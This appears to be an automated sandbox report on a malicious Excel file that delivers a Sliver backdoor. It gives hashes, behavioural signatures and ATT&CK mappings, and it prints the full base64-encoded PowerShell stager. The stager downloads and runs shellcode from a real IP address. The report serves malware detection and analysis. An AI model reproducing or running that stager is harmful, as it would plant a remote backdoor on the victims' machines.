sliver | d3645c6f005381366ad46a3258ae9b7596b2f6be6e7cb17f1919e6e11379e58f

General

Target

d3645c6f005381366ad46a3258ae9b7596b2f6be6e7cb17f1919e6e11379e58f.xls
Size

46KB
MD5

88d24e11d952ac036b9bcc1578211f67
SHA1

8854515373e2d1449f91f027cfa467d1272287e9
SHA256

d3645c6f005381366ad46a3258ae9b7596b2f6be6e7cb17f1919e6e11379e58f
SHA512

b2d44d8851a5e70afb1473ef82f89ac40c0dec3a56ecd5db9c381635188bc78e9c64dd4acce6e31db563c8fc9bb7a20c760f2164ae7608709e1c513abd6f82d1
SSDEEP

768:T4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:USFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor discovery execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	3048	1612	powershell.exe	29

Sliver RAT v2 1 IoCs

resource	yara_rule
behavioral1/memory/3048-46-0x0000000006510000-0x0000000006F8E000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	3048	powershell.exe
6	3048	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3048	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1612	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3048	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3048	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1612	EXCEL.EXE
1612	EXCEL.EXE
1612	EXCEL.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1612 wrote to memory of 3048	1612	EXCEL.EXE	30
PID 1612 wrote to memory of 3048	1612	EXCEL.EXE	30
PID 1612 wrote to memory of 3048	1612	EXCEL.EXE	30
PID 1612 wrote to memory of 3048	1612	EXCEL.EXE	30
PID 3048 wrote to memory of 2680	3048	powershell.exe	32
PID 3048 wrote to memory of 2680	3048	powershell.exe	32
PID 3048 wrote to memory of 2680	3048	powershell.exe	32
PID 3048 wrote to memory of 2680	3048	powershell.exe	32
PID 2680 wrote to memory of 2752	2680	csc.exe	33
PID 2680 wrote to memory of 2752	2680	csc.exe	33
PID 2680 wrote to memory of 2752	2680	csc.exe	33
PID 2680 wrote to memory of 2752	2680	csc.exe	33

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d3645c6f005381366ad46a3258ae9b7596b2f6be6e7cb17f1919e6e11379e58f.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1612
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3048
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jhzw7kek.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES951F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC950F.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabA4C9.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES951F.tmp

Filesize
1KB

MD5
f643be34e1ee816c257536838aad3e19

SHA1
6189722c2cad5459b40a8eebc63568a918f2ce93

SHA256
ddde60af498472202bb942721efb9ad0353ebfb8ec729d10ee0a2057e46d8bc7

SHA512
abab7ac0c4b8918ad25493e104fc07254415f0db12b1cd11cdcbd6526971715cede44194191824813f9a7c51db3b1756b269f315b42b1b7fad6524afffe00af3

Download Submit
C:\Users\Admin\AppData\Local\Temp\jhzw7kek.dll

Filesize
3KB

MD5
58454590da106c0a09e58626805e2464

SHA1
bda992ba66e63836251f84053e248c6599273a35

SHA256
3bcd97f389cc4a4ea8cf9220f3dde8b76bce55d87b0ff646b9268c0ed70d3e39

SHA512
ee8f3b59529fa84b5f4dbdd96b62aa5392347c1fd14eb47b99502567b7fdacbeaaae23b584b81e265b5f524734e05f26743e2c4c175475220959019a99aaa74f

Download Submit
C:\Users\Admin\AppData\Local\Temp\jhzw7kek.pdb

Filesize
7KB

MD5
abf658a1a7d79bdfaba581a45e9434eb

SHA1
53e57fd8514a4c22073395b912fef93517012217

SHA256
121887cf07da9e3155b7546b269eb6554a426c48793ee5ad540dfe2ea0501da0

SHA512
36edd39c21ab3599d2dd92272299d0a1234aa5fe6f1700071f160d7c9282445e3caed26037c768010d542e43c18ebcbf2be336a407a8a4d21a7e94116a7552f9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC950F.tmp

Filesize
652B

MD5
96f05be671411a86968bb7b5e3f63e8f

SHA1
5b9844d771dffbcb71ad6a7daafd3f4b7b19b140

SHA256
cd1aa0ade5bdc17152fa294787631872e80c06bc32ce95145077bdee3472d968

SHA512
282ea42f96dd0c37f9a5da135f931dc69fc7b455cb9045acee6d60bed94c40cdd509fb5a9e7b2e29b2a1e58d94f807b4b7c3bede00fa6f3de29663738c779077

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jhzw7kek.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jhzw7kek.cmdline

Filesize
309B

MD5
1c33ad271479acd40effc537906d0c6c

SHA1
65d5e575df5efa2de843480ad51367ca15910d4f

SHA256
533ad75e9c44cb987e419108468e57bf2525041e58f3bf51b2e2bc591e7bc299

SHA512
42956ed38859088974201a228bec478fd65252b682bfabdac0949063bca983349cf597c4d154836bf15b60e4c332eecfd3ac4c0853aeae80e1dca5474ceb6054

Download Submit
memory/1612-8-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1612-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1612-7-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1612-6-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1612-3-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1612-2-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1612-27-0x0000000072C3D000-0x0000000072C48000-memory.dmp

Filesize
44KB

Download
memory/1612-35-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1612-1-0x0000000072C3D000-0x0000000072C48000-memory.dmp

Filesize
44KB

Download
memory/1612-45-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/3048-46-0x0000000006510000-0x0000000006F8E000-memory.dmp

Filesize
10.5MB

Download

Analysis

Sharing